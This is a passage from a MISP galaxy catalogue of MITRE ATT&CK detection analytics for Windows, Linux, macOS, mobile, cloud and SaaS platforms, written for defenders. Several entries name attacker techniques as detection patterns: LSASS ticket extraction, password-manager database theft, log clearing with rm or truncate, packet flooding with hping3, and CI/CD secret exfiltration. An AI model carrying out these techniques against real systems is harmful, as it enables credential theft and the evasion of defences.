External references
Associated metadata
Metadata key Value
external_id AN1337
mitre_platforms ['Linux']

Analytic 1373 - AN1373

Detection of adversaries tampering with container runtime security plugins, disabling admission controllers, or stopping monitoring sidecars.

Internal MISP references

UUID f421cbe1-d42e-45e9-adad-12c6ed0a5cb8 which can be used as unique global reference for Analytic 1373 - AN1373 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1373
mitre_platforms ['Containers']

Analytic 1733 - AN1733

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 50e52979-5f21-4a02-99f3-fc1858b73369 which can be used as unique global reference for Analytic 1733 - AN1733 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1733
mitre_platforms ['iOS']

Analytic 1338 - AN1338

Multiple failed login attempts across different users using common password patterns (e.g., 'Welcome2023')

Internal MISP references

UUID 36c2c2fb-0bea-40fe-9032-c0758d381de5 which can be used as unique global reference for Analytic 1338 - AN1338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1338
mitre_platforms ['macOS']

Analytic 1383 - AN1383

Detects non-standard compilation activity via Xcode CLI tools or bundled GCC/MONO packages writing new executable files and executing them outside dev environments (e.g., user Downloads folder).

Internal MISP references

UUID 56a814a9-2b6b-4fcc-a530-e9ca62faaa17 which can be used as unique global reference for Analytic 1383 - AN1383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1383
mitre_platforms ['macOS']

Analytic 1833 - AN1833

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID a3b1f9ea-184b-4429-94c0-d04c3b457b91 which can be used as unique global reference for Analytic 1833 - AN1833 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1833
mitre_platforms ['Android']

Analytic 1339 - AN1339

Sign-in failures across enterprise SSO applications or SaaS platforms from same IP address using the same password against multiple user identities

Internal MISP references

UUID 0527196a-1551-445c-bdd7-943dfda9b718 which can be used as unique global reference for Analytic 1339 - AN1339 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1339
mitre_platforms ['Identity Provider']

Analytic 1393 - AN1393

Detects anomalous use of Dynamic Data Exchange (DDE) for code execution, such as Office applications (WINWORD.EXE, EXCEL.EXE) spawning command interpreters, or loading unusual modules through DDEAUTO/DDE formulas. Correlates suspicious parent-child process relationships, registry keys enabling DDE, and module loads inconsistent with normal Office usage.

Internal MISP references

UUID d9383849-c91c-4eef-88a0-97c2454ca1af which can be used as unique global reference for Analytic 1393 - AN1393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1393
mitre_platforms ['Windows']

Analytic 1434 - AN1434

Executable or script generating large outbound network traffic targeting remote hosts or known amplification ports

Internal MISP references

UUID 0eff49de-834e-42d3-9a7a-3ac032aa9836 which can be used as unique global reference for Analytic 1434 - AN1434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1434
mitre_platforms ['Windows']

Analytic 1344 - AN1344

Behavioral chain: (1) a login from a third-party account or untrusted source network establishes an interactive/remote session; (2) the session acquires elevated privileges or accesses sensitive resources atypical for that account; (3) subsequent lateral movement or data access occurs from the same session/device. Correlate Windows logon events, token elevation/privileged use, and resource access with third-party context.

Internal MISP references

UUID 46630fc8-75de-4b73-b46e-0a4eeb7ad310 which can be used as unique global reference for Analytic 1344 - AN1344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1344
mitre_platforms ['Windows']

Analytic 1443 - AN1443

Detects anomalous Kerberos activity such as forged or stolen tickets by correlating malformed fields in logon events, RC4-encrypted TGTs, or TGS requests without corresponding TGT requests. Also detects suspicious processes accessing LSASS memory for ticket extraction.

Internal MISP references

UUID 685b05a6-92a3-417d-a917-8e7689e43237 which can be used as unique global reference for Analytic 1443 - AN1443 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1443
mitre_platforms ['Windows']

Analytic 1435 - AN1435

Flooding tools like hping3 or nping sending large volumes of packets across multiple ports or IPs

Internal MISP references

UUID 1578f892-0644-4974-bf55-9abb802612fa which can be used as unique global reference for Analytic 1435 - AN1435 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1435
mitre_platforms ['Linux']

Analytic 1534 - AN1534

Detection focuses on identifying unauthorized file creation or modification within /etc/emond.d/rules/ or /private/var/db/emondClients, which indicate attempts to register a malicious emond rule. Correlate with process execution of /sbin/emond and any launched commands it invokes, especially during boot or login events. Anomalies may include rules created by non-root users or unexpected shell commands executed by emond.

Internal MISP references

UUID 5e4aea30-f04b-4f1e-b68a-f2f3a95e5066 which can be used as unique global reference for Analytic 1534 - AN1534 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1534
mitre_platforms ['macOS']

Analytic 1354 - AN1354

Enumeration of USB and other peripheral hardware via udevadm, lshw, or /sys or /proc interfaces in proximity to collection or mounting behavior.

Internal MISP references

UUID c8d9ad93-e4ce-4b00-89cb-8f0f6452923d which can be used as unique global reference for Analytic 1354 - AN1354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1354
mitre_platforms ['Linux']

Analytic 1345 - AN1345

Behavioral chain: (1) sshd or federated SSO logins from third-party networks or identities; (2) rapid sudo/su privilege elevation; (3) access to sensitive paths or east-west SSH. Correlate auth logs, process execution, and network flows.

Internal MISP references

UUID e19cbf11-fabf-4dfd-aeb2-1c62660ebd8f which can be used as unique global reference for Analytic 1345 - AN1345 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1345
mitre_platforms ['Linux']

Analytic 1453 - AN1453

Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts.

Internal MISP references

UUID eca769c3-9497-4c87-b624-4003fd1b0304 which can be used as unique global reference for Analytic 1453 - AN1453 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1453
mitre_platforms ['Linux']

Analytic 1543 - AN1543

Detection of compromised or misused valid accounts via anomalous logon patterns, abnormal logon types, and inconsistent geographic or time-based activity across Windows endpoints.

Internal MISP references

UUID f9c3a686-2894-498d-9d04-7ac510752e1f which can be used as unique global reference for Analytic 1543 - AN1543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1543
mitre_platforms ['Windows']

Analytic 1364 - AN1364

Monitor SaaS financial systems (e.g., QuickBooks, Workday, SAP S/4HANA cloud) for unauthorized access, rule changes, or mass export of financial data. Detect anomalous transfers initiated via SaaS APIs or new MFA-disabled logins targeting finance apps.

Internal MISP references

UUID 3bac57c4-1539-4048-b325-88032c78ed08 which can be used as unique global reference for Analytic 1364 - AN1364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1364
mitre_platforms ['SaaS']

Analytic 1463 - AN1463

Execution of user-downloaded or created scripts with hidden extensions due to RTLO character insertion in filename, often present in desktop environments or phishing campaigns.

Internal MISP references

UUID 7a72f91d-9c16-4724-b87d-3e5448f81b51 which can be used as unique global reference for Analytic 1463 - AN1463 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1463
mitre_platforms ['Linux']

Analytic 1346 - AN1346

Behavioral chain: (1) third-party interactive login or mobileconfig-based device enrollment; (2) privilege use or admin group change; (3) lateral movement mounts/ssh. Correlate unified logs and network telemetry.

Internal MISP references

UUID 7c28e2f5-c944-4974-810f-81bcfdc8b6cc which can be used as unique global reference for Analytic 1346 - AN1346 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1346
mitre_platforms ['macOS']

Analytic 1436 - AN1436

Adversaries inject VBA macros into Office templates such as Normal.dotm or Personal.xlsb or redirect Office template load path via registry key (GlobalDotName) to gain persistence. Template macros trigger execution of malicious code on application startup.

Internal MISP references

UUID 85b4c967-56bc-4990-b3e2-7e40f3ef1852 which can be used as unique global reference for Analytic 1436 - AN1436 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1436
mitre_platforms ['Windows']

Analytic 1643 - AN1643

Detection of password manager database access (1Password .opvault, LastPass caches, KeePass .kdbx) outside expected parent processes. Identifies memory scraping attempts via suspicious API calls or tools attaching to password manager processes.

Internal MISP references

UUID de1d4807-fcb5-4112-b310-ea0c4df45af2 which can be used as unique global reference for Analytic 1643 - AN1643 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1643
mitre_platforms ['macOS']

Analytic 1634 - AN1634

Detects kernel- or user-space exploitation attempts targeting auditd, AV daemons, or security monitoring agents. Defender observation includes unexpected segfaults, privilege escalation attempts from low-privileged processes, or modifications to security binaries. Correlates exploitation attempts with subsequent gaps in logging or terminated processes.

Internal MISP references

UUID ecf26d05-48ef-43b2-bfc3-4ea331be735b which can be used as unique global reference for Analytic 1634 - AN1634 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1634
mitre_platforms ['Linux']

Analytic 1473 - AN1473

Detects anomalous CI/CD workflow execution originating from forked repositories, with pull request (PR) metadata or commit messages containing suspicious patterns (e.g., encoded payloads), coupled with the use of insecure pipeline triggers like pull_request_target or excessive API usage of CI/CD secrets. Correlation with unusual artifact generation or secret exfiltration via encoded or external network destination URLs confirms suspicious behavior.

Internal MISP references

UUID 0391c880-fcb3-457f-b625-18f9453659b8 which can be used as unique global reference for Analytic 1473 - AN1473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1473
mitre_platforms ['SaaS']

Analytic 1437 - AN1437

Malicious VBA macros embedded in base templates like Normal.dotm or Personal.xlsb are automatically loaded and executed at startup. Template path may be hijacked to load a remote or attacker-controlled template via GlobalDotName registry setting.

Internal MISP references

UUID 17bc7c97-7322-4619-84c5-50e45aa6627d which can be used as unique global reference for Analytic 1437 - AN1437 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1437
mitre_platforms ['Office Suite']

Analytic 1374 - AN1374

Detection of adversaries modifying startup configuration files to disable signature verification, logging, or monitoring features.

Internal MISP references

UUID e542342f-5a08-408d-b292-797bcb2da5eb which can be used as unique global reference for Analytic 1374 - AN1374 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1374
mitre_platforms ['Network Devices']

Analytic 1347 - AN1347

Behavioral chain: (1) delegated admin or external identity establishes session (e.g., partner/reseller DAP, B2B guest, SAML/OAuth trust); (2) role elevation or app consent/permission grant; (3) downstream privileged actions in the tenant. Correlate IdP sign-in, admin/role assignment, and consent/admin-on-behalf events.

Internal MISP references

UUID f0e2baa2-3bb7-4587-8eae-6abddd1cf140 which can be used as unique global reference for Analytic 1347 - AN1347 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1347
mitre_platforms ['Identity Provider']

Analytic 1734 - AN1734

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 4773bc29-5272-45d5-92bd-b24a34b16df6 which can be used as unique global reference for Analytic 1734 - AN1734 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1734
mitre_platforms ['Android']

Analytic 1743 - AN1743

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 9253e546-bc55-42c1-bf8c-b4337a1ea5b5 which can be used as unique global reference for Analytic 1743 - AN1743 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1743
mitre_platforms ['Android']

Analytic 1483 - AN1483

Processes such as plink.exe, ssh.exe, or netsh.exe establishing outbound network connections where traffic patterns show encapsulated protocols (e.g., RDP over SSH). Defender observations include anomalous process-to-network relationships, large asymmetric data flows, and port usage mismatches.

Internal MISP references

UUID 64c6aa46-a824-4c8e-8462-d0a58b78acfb which can be used as unique global reference for Analytic 1483 - AN1483 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1483
mitre_platforms ['Windows']

Analytic 1438 - AN1438

Detects log-clearing behavior by correlating suspicious command execution targeting log files under /var/log/, anomalous deletions or truncations of system logs, and unusual child processes (e.g., shell pipelines or redirections).

Internal MISP references

UUID 6ffa0db8-a088-4e7a-b8e5-50a204762cca which can be used as unique global reference for Analytic 1438 - AN1438 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1438
mitre_platforms ['Linux']

Analytic 1348 - AN1348

Behavioral chain: (1) cross-account or third-party principal assumes a role into the tenant/subscription/project; (2) privileged API calls are made in short succession; (3) access originates from unfamiliar networks or geos. Correlate assume-role/federation events with sensitive API usage.

Internal MISP references

UUID c526f8c1-95ec-494f-b7bf-49a95a803f2a which can be used as unique global reference for Analytic 1348 - AN1348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1348
mitre_platforms ['IaaS']

Analytic 1384 - AN1384

Abuse of file/registry attributes to hide malicious files, directories, or services. Defender view: detection of attrib.exe setting hidden/system flags, creation of Alternate Data Streams, or registry keys altering file visibility.

Internal MISP references

UUID e01b29cd-2369-4ad5-bd91-98994f36cd1e which can be used as unique global reference for Analytic 1384 - AN1384 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1384
mitre_platforms ['Windows']

Analytic 1843 - AN1843

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID b6d679b6-0777-4541-874c-d81f37d8fb07 which can be used as unique global reference for Analytic 1843 - AN1843 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1843
mitre_platforms ['Android']

Analytic 1834 - AN1834

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID ea9bb66e-1ced-4448-8d64-4184ae1c0ac9 which can be used as unique global reference for Analytic 1834 - AN1834 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1834
mitre_platforms ['iOS']

Analytic 1349 - AN1349

Behavioral chain: (1) third-party app or admin connects via OAuth/marketplace install; (2) high-privilege scopes granted; (3) anomalous actions (mass read/exports, admin changes).

Internal MISP references

UUID 4766bdc0-047a-4250-93c1-6d907178620e which can be used as unique global reference for Analytic 1349 - AN1349 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1349
mitre_platforms ['SaaS']

Analytic 1943 - AN1943

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 746ebd79-2d1f-4e58-8bdb-b49a236a9642 which can be used as unique global reference for Analytic 1943 - AN1943 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1943
mitre_platforms ['PRE']

Analytic 1493 - AN1493

Unauthorized instance creation in unmonitored or unused regions. Burst of compute-intensive jobs in spot instances or sudden spike in resource usage in legitimate VMs.

Internal MISP references

UUID 7a5e5aff-8395-4b4e-9072-dd765dae7d19 which can be used as unique global reference for Analytic 1493 - AN1493 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1493
mitre_platforms ['IaaS']

Analytic 1439 - AN1439

Detects adversary clearing log files on macOS by correlating calls to shell utilities (e.g., echo >, rm, truncate) targeting files in /var/log/ with unusual context (non-administrative users or abnormal process lineage).

Internal MISP references

UUID b4e2440e-8956-4ae6-94cb-da859f407f27 which can be used as unique global reference for Analytic 1439 - AN1439 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1439
mitre_platforms ['macOS']

Analytic 1394 - AN1394

Detection of command-line activity exhibiting syntactic obfuscation patterns, such as excessive escape characters, base64 encoding, command concatenation, or outlier command length and entropy.

Internal MISP references

UUID e6e98024-2fa7-444c-af90-32ec5d4d2666 which can be used as unique global reference for Analytic 1394 - AN1394 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1394
mitre_platforms ['Windows']

Analytic 1355 - AN1355

Execution of system utilities like 'system_profiler' and 'ioreg' to enumerate hardware components or USB devices, particularly if followed by clipboard, file, or network activity.

Internal MISP references

UUID 479e5749-a746-4b17-9543-ca4b9d41576a which can be used as unique global reference for Analytic 1355 - AN1355 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1355
mitre_platforms ['macOS']

Analytic 1553 - AN1553

macOS environmental validation behavioral chain: (1) System profiling through system_profiler, sysctl, and hardware discovery commands, (2) Network interface and configuration enumeration for geolocation and network environment validation, (3) Application installation and version discovery for software environment fingerprinting, (4) Security feature detection (SIP, Gatekeeper, XProtect status), (5) Conditional payload execution based on macOS-specific environmental criteria and System Integrity Protection bypass validation

Internal MISP references

UUID 65abf5f4-ddb9-4eac-a926-1bef5d6b5c63 which can be used as unique global reference for Analytic 1553 - AN1553 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1553
mitre_platforms ['macOS']

Analytic 1535 - AN1535

MSBuild.exe is invoked outside expected developer/build contexts or with anomalous arguments (e.g., non-canonical paths, remote shares, Base64/obfuscated property values). Within a short window, it (a) spawns high-risk LOLBins/script interpreters, (b) writes new PE/DLL/script artifacts into user-writable paths and executes them, (c) loads unsigned/user-writable modules, (d) performs memory injection/thread creation into other processes, and/or (e) initiates outbound network connections.

Internal MISP references

UUID e24b6c08-4fd0-40c7-a71a-762cc08d6085 which can be used as unique global reference for Analytic 1535 - AN1535 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1535
mitre_platforms ['Windows']

Analytic 1365 - AN1365

Monitor email and document management systems for fraudulent invoices, impersonation of vendors, or BEC-style payment redirections. Detect abnormal editing of invoice templates, or emails containing known fraud language combined with attachment delivery.

Internal MISP references

UUID 03364dc1-4b76-4a30-83cf-ae101b960d8e which can be used as unique global reference for Analytic 1365 - AN1365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1365
mitre_platforms ['Office Suite']

Analytic 1356 - AN1356

Defenders should monitor for anomalous or unauthorized changes to cloud compute configurations that alter quotas, tenant-wide policies, subscription associations, or allowed deployment regions. From a defender’s perspective, suspicious behavior chains include a sudden increase in compute quota requests followed by new instance or resource creation, policy modifications that weaken security restrictions, or enabling previously unused/unsupported cloud regions. Correlation across identity, configuration, and subsequent provisioning logs is critical to distinguish legitimate administrative activity from adversarial abuse.

Internal MISP references

UUID 193f0293-0a53-430f-83c0-a69d0663479a which can be used as unique global reference for Analytic 1356 - AN1356 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1356
mitre_platforms ['IaaS']

Analytic 1635 - AN1635

Detects exploitation of macOS security and integrity services, such as Gatekeeper, XProtect, or EDR agents. Defender observations include unsigned processes attempting privileged operations, abnormal termination of security daemons, or modification of system integrity logs.

Internal MISP references

UUID 88d9dbea-cc85-4c94-a368-e5c1a603854b which can be used as unique global reference for Analytic 1635 - AN1635 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1635
mitre_platforms ['macOS']

Analytic 1536 - AN1536

Registry key modification to AppInit_DLLs value followed by anomalous DLL loading by processes importing user32.dll, especially unsigned or uncommon DLLs, suggesting unauthorized AppInit persistence or privilege escalation.

Internal MISP references

UUID e886b9c8-2187-4363-9043-1e5c60d75363 which can be used as unique global reference for Analytic 1536 - AN1536 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1536
mitre_platforms ['Windows']

Analytic 1563 - AN1563

Execution of commands to query system locale and language settings, such as 'defaults read -g AppleLocale' or 'systemsetup -gettimezone'. Unusual parent processes or execution contexts of these commands may indicate adversarial discovery.

Internal MISP references

UUID ffc71b21-982b-4fc7-8276-bd679d67bc95 which can be used as unique global reference for Analytic 1563 - AN1563 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1563
mitre_platforms ['macOS']

Analytic 1653 - AN1653

Integrity checking mechanisms can potentially detect unauthorized hardware modifications.

Internal MISP references

UUID 9e2b0e14-eabd-4eb7-93b0-da238e3786db which can be used as unique global reference for Analytic 1653 - AN1653 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1653
mitre_platforms ['Android']

Analytic 1357 - AN1357

Detects anomalous use of COM, DDE, or named pipes for execution. Correlates creation or access of IPC mechanisms (e.g., named pipes, COM objects) with unusual parent-child process relationships or code injection patterns (e.g., Office spawning cmd.exe via DDE).

Internal MISP references

UUID 0c6a8e7a-f9d0-479a-88c1-4ce26edba81c which can be used as unique global reference for Analytic 1357 - AN1357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1357
mitre_platforms ['Windows']

Analytic 1537 - AN1537

Detects suspicious use of ESXi native CLI tools like esxcli and vim-cmd by unauthorized users or outside expected maintenance windows. Focus is on actions such as stopping VMs, reconfiguring network/firewall settings, and enabling SSH or logging.

Internal MISP references

UUID 2fa4d134-8583-4cbe-bc84-bfc799205116 which can be used as unique global reference for Analytic 1537 - AN1537 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1537
mitre_platforms ['ESXi']

Analytic 1573 - AN1573

Applications or scripts invoking cloud storage APIs (Dropbox sync, iCloud, Google Drive client) in unexpected contexts. Defender perspective: detect sensitive file reads by non-standard applications followed by unusual encrypted uploads to external cloud storage domains.

Internal MISP references

UUID 535e9bc8-b033-4aee-88e1-bd48699b7856 which can be used as unique global reference for Analytic 1573 - AN1573 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1573
mitre_platforms ['macOS']

Analytic 1375 - AN1375

A process creates a brand‑new logon session/token (LogonUser/LsaLogonUser) and then assigns/impersonates it (SetThreadToken/ImpersonateLoggedOnUser) to run actions under that freshly created security context. Chain: (1) suspicious command or script block (e.g., runas /netonly, PowerShell P/Invoke of LogonUser) → (2) ETW/API evidence of LogonUser/SetThreadToken → (3) Security 4624 New Logon (often LogonType=9 NewCredentials or 2/3 from a non‑interactive parent) with no interactive desktop → (4) sysmon 1 process(es) executing with the new LogonId/SID different from the parent process → (5) optional privileged ops/lateral movement.

Internal MISP references

UUID 6eab700a-548f-48aa-8821-163682fe8bbe which can be used as unique global reference for Analytic 1375 - AN1375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1375
mitre_platforms ['Windows']

Analytic 1735 - AN1735

Application vetting services may detect when an application requests permissions after an application update. Application vetting services may look for indications that the application’s update includes malicious code at runtime. Application vetting services may be able to list domains and/or IP addresses that applications communicate with.

Internal MISP references

UUID 3fe80400-0e8c-4ffa-8233-cebf7511613c which can be used as unique global reference for Analytic 1735 - AN1735 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1735
mitre_platforms ['Android']

Analytic 1753 - AN1753

Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.

Internal MISP references

UUID b2120e89-a453-4575-8458-7700ea59f85a which can be used as unique global reference for Analytic 1753 - AN1753 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1753
mitre_platforms ['Android']

Analytic 1385 - AN1385

Hidden file creation using leading '.' or file attribute changes with chattr (immutable/hidden flags). Defender view: detect execution of chattr, lsattr anomalies, and unusual hidden files appearing in system directories.

Internal MISP references

UUID 2c3ec402-b9e9-4091-a04d-3b73f260e669 which can be used as unique global reference for Analytic 1385 - AN1385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1385
mitre_platforms ['Linux']

Analytic 1583 - AN1583

Execution of network enumeration utilities (e.g., net.exe, ping.exe, tracert.exe) in short succession, often chained with lateral movement tools or system enumeration commands.

Internal MISP references

UUID 498eb889-4468-4c55-9337-df219d5f142b which can be used as unique global reference for Analytic 1583 - AN1583 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1583
mitre_platforms ['Windows']

Analytic 1538 - AN1538

Correlate process execution of shutdown/reboot commands (e.g., shutdown.exe, restart-computer) with host status change logs (Event IDs 1074, 6006) and absence of related administrative context (e.g., user not in Helpdesk group).

Internal MISP references

UUID 52b9bf67-304e-403f-9b81-4d4b9d974ad6 which can be used as unique global reference for Analytic 1538 - AN1538 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1538
mitre_platforms ['Windows']

Analytic 1358 - AN1358

Detects abuse of UNIX domain sockets, pipes, or message queues for unauthorized code execution. Correlates unexpected socket creation with suspicious binaries, abnormal shell pipelines, or injected processes establishing IPC channels.

Internal MISP references

UUID ae8e028c-2c3a-4ac0-964f-d0b59533190d which can be used as unique global reference for Analytic 1358 - AN1358 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1358
mitre_platforms ['Linux']

Analytic 1835 - AN1835

Mobile security products can use attestation to detect compromised devices.

Internal MISP references

UUID b6618b3a-370c-44af-86db-d4640799ed6e which can be used as unique global reference for Analytic 1835 - AN1835 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1835
mitre_platforms ['Android']

Analytic 1853 - AN1853

Application vetting services can detect malicious code in applications. System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.

Internal MISP references

UUID b95bc556-c98c-459e-9327-49830ce9c77c which can be used as unique global reference for Analytic 1853 - AN1853 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1853
mitre_platforms ['Android']

Analytic 1359 - AN1359

Detects anomalous use of Mach ports, Apple Events, or XPC services for inter-process execution or code injection. Focuses on unexpected processes attempting to send privileged Apple Events (e.g., automation scripts injecting into security-sensitive apps).

Internal MISP references

UUID 3f42390d-2a44-4094-9cea-429f1286f8aa which can be used as unique global reference for Analytic 1359 - AN1359 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1359
mitre_platforms ['macOS']

Analytic 1953 - AN1953

Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts). Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID 5880eb25-eec5-4b40-a3fa-6a3c633a3e56 which can be used as unique global reference for Analytic 1953 - AN1953 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1953
mitre_platforms ['PRE']

Analytic 1395 - AN1395

Detection of shell commands that leverage encoded execution, command chaining, excessive piping, or unusual token patterns indicative of obfuscation.

Internal MISP references

UUID cad9e775-f40f-42fb-8e86-c7aba249a8e4 which can be used as unique global reference for Analytic 1395 - AN1395 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1395
mitre_platforms ['Linux']

Analytic 1593 - AN1593

Unexpected modification of the KernelCallbackTable in a process’s PEB followed by invocation of modified callback functions (e.g., fnCOPYDATA) through Windows messages. Defender observes suspicious API call chains such as NtQueryInformationProcess → WriteProcessMemory → abnormal GUI callback execution, often correlating to anomalous process behavior such as network activity or code injection.

Internal MISP references

UUID da853af7-f2e4-45c2-b78f-3d960fff638e which can be used as unique global reference for Analytic 1593 - AN1593 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1593
mitre_platforms ['Windows']

Analytic 1539 - AN1539

Detect 'shutdown', 'reboot', or 'systemctl poweroff' executions with auditd/syslog and absence of scheduled maintenance windows or approved user context.

Internal MISP references

UUID f1a019df-12f0-442e-9b0e-b1a82352389b which can be used as unique global reference for Analytic 1539 - AN1539 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1539
mitre_platforms ['Linux']

Analytic 1636 - AN1636

Detects exploitation of IaaS cloud security boundaries to evade defense controls. Defender perspective includes anomalous API calls that bypass audit logging, disable monitoring, or manipulate guardrails (e.g., CloudTrail tampering). Correlation highlights when exploitation attempts precede sudden absence of expected telemetry.

